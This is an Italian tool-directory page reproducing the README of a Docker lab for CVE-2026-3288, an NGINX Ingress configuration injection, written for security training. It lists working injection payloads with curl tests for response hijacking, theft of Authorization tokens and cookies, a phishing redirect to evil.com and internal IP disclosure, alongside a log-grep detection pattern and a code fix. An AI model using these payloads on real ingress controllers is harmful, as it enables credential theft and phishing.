Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-3288-lab — # Laboratorio vulnerabile basato su Docker per CVE-2026-3288 NGINX Ingress configuration injection, con script di exploit, monitoraggio di rilevamento e guida alla remediation per formazione sulla sicurezza autorizzata. | Kitploit
Strumenti/GitHubGitHub/bvabhishek/cve-2026-3288-lab
Sicurezza dell'Infrastruttura CloudSicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebAudit di ConfigurazionePenetration TestingApprendimento e FormazioneLab e Pratica
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# Laboratorio vulnerabile basato su Docker per CVE-2026-3288 NGINX Ingress configuration injection, con script di exploit, monitoraggio di rilevamento e guida alla remediation per formazione sulla sicurezza autorizzata.

Vedi Repository
165 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-3288 Vulnerable Lab (Docker)

Iniezione di Configurazione nel NGINX Ingress Controller

⚠️ AVVISO: Questo lab contiene configurazioni intenzionalmente vulnerabili SOLO PER FORMAZIONE SULLA SICUREZZA AUTORIZZATA

Panoramica della Vulnerabilità

CVE-2026-3288 (CVSS 8.8 ALTA) - Iniezione di configurazione nel NGINX Ingress Controller

  • Versioni Interessate: < v1.13.8, v1.14.4, v1.15.0
  • Vettore di Attacco: Iniezione di doppie virgolette (") nella configurazione del percorso
  • Impatto: Esecuzione di Codice Remota, Divulgazione di Segreti, Furto di Credenziali
  • Correlata: CVE-2026-24512 (iniezione di percorso simile)

Causa Principale

La funzione buildProxyPass() non sanifica l'input del percorso prima di interpolarlo nella configurazione di nginx, consentendo agli attaccanti di uscire dalle stringhe tra virgolette e iniettare direttive nginx arbitrarie.

Componenti del Lab

root@kitploit:~
CVE-2026-3288-lab/
├── README.md                          # Questo file
├── docker-compose.yml                 # Configurazione principale del lab
├── docker/
│   ├── nginx/
│   │   ├── Dockerfile                # Configurazione NGINX vulnerabile
│   │   ├── nginx.conf                # Configurazione di base
│   │   └── vulnerable-config.conf    # Gestione vulnerabile del percorso
│   └── backend/
│       ├── Dockerfile                # Semplice applicazione backend
│       └── app.py                    # Applicazione Flask
├── exploits/
│   ├── exploit.py                    # Script di sfruttamento automatizzato
│   ├── payloads.txt                  # Raccolta di payload di sfruttamento
│   └── test-exploits.sh              # Testa tutti gli exploit
├── detection/
│   └── monitor-logs.sh               # Monitora i tentativi di sfruttamento
└── cleanup/
    └── cleanup.sh                    # Rimuove tutte le risorse del lab

Prerequisiti

  • Docker installato
  • Docker Compose installato
  • Python 3.6+ (per gli script di sfruttamento)
  • curl o wget
  • Minimo 2GB di RAM

Avvio Rapido

1. Avvia il Lab

root@kitploit:~
cd CVE-2026-3288-lab

# Avvia l'ambiente vulnerabile
docker-compose up -d

# Controlla lo stato
docker-compose ps

2. Verifica l'Installazione

root@kitploit:~
# Testa che il backend sia in esecuzione
curl http://localhost:8080/

# Testa che NGINX sia in esecuzione
curl http://localhost/

3. Esegui gli Exploit

root@kitploit:~
cd exploits

# Sfruttamento automatizzato
python3 exploit.py --all

# Oppure testa i singoli exploit
bash test-exploits.sh

4. Monitora i Log

root@kitploit:~
# Osserva i log NGINX per attività di sfruttamento
docker-compose logs -f nginx

# Monitora il rilevamento
cd detection
bash monitor-logs.sh

5. Pulizia

root@kitploit:~
docker-compose down -v

Scenari di Attacco

Scenario 1: Dirottamento della Risposta

Inietta la direttiva return di nginx per servire contenuti controllati dall'attaccante.

Payload:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

Test:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

Scenario 2: Furto di Credenziali

Rifletti gli header Authorization nella risposta per rubare i token Bearer.

Payload:

root@kitploit:~
/login" return 200 "Token: $http_authorization

Test:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

Scenario 3: Reindirizzamento di Phishing

Reindirizza gli utenti verso un sito di phishing controllato dall'attaccante.

Payload:

root@kitploit:~
/" return 302 "https://evil.com/phishing

Test:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

Scenario 4: Divulgazione dell'IP Interno

Divulga informazioni interne del server.

Payload:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

Test:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

Scenario 5: Furto di Cookie

Rubare i cookie di sessione.

Payload:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

Test:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

Come Funziona

Modello di Codice Vulnerabile

root@kitploit:~
# Configurazione vulnerabile
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

Sfruttamento

Quando il percorso contiene ", interrompe la stringa tra virgolette:

root@kitploit:~
# Input dell'attaccante: /api" return 200 "HACKED
# Risultato:
location ~ "^/api" return 200 "HACKED" {
    # La configurazione originale è ora rotta
}

Rilevamento

Monitoraggio dei Log

root@kitploit:~
# Cerca pattern sospetti
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

Rilevamento Manuale

root@kitploit:~
# Controlla la configurazione NGINX per direttive iniettate
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

Rimedio

Azioni Immediate

  1. Validazione dell'Input - Sanifica tutti gli input dei percorsi
  2. Escape dei Caratteri Speciali - Esegui correttamente l'escape di " e \
  3. Usa Allowlist - Consenti solo percorsi noti e sicuri
  4. Monitora i Log - Genera avvisi su pattern sospetti

Correzione del Codice

root@kitploit:~
// Prima (vulnerabile)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// Dopo (corretto)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

Obiettivi di Apprendimento

Dopo aver completato questo lab, comprenderai:

  1. ✅ Come funzionano le vulnerabilità di iniezione di configurazione
  2. ✅ L'impatto di una sanificazione insufficiente dell'input
  3. ✅ Molteplici tecniche di sfruttamento
  4. ✅ Metodi di rilevamento tramite analisi dei log
  5. ✅ Strategie di rimedio appropriate

Risoluzione dei Problemi

I contenitori non si avviano

root@kitploit:~
# Controlla i log
docker-compose logs

# Riavvia
docker-compose restart

Porta già in uso

root@kitploit:~
# Cambia le porte in docker-compose.yml
# Oppure ferma i servizi in conflitto
sudo lsof -i :80

Gli exploit non funzionano

root@kitploit:~
# Verifica che NGINX sia in esecuzione
docker-compose ps nginx

# Controlla la configurazione NGINX
docker exec cve-2026-3288-nginx nginx -t

Avviso di Sicurezza

  • ⚠️ SOLO da utilizzare in ambienti lab isolati
  • ⚠️ MAI distribuire su sistemi di produzione
  • ⚠️ MAI esporre a internet
  • ⚠️ Assicurati di avere la dovuta autorizzazione prima dei test
  • ⚠️ Segui le pratiche di divulgazione responsabile

Riferimenti

  • Avviso CVE-2026-3288
  • Fix PR #14667
  • Analisi Sysdig

Creato esclusivamente per formazione sulla sicurezza autorizzata e scopi di ricerca

Scarica lo strumento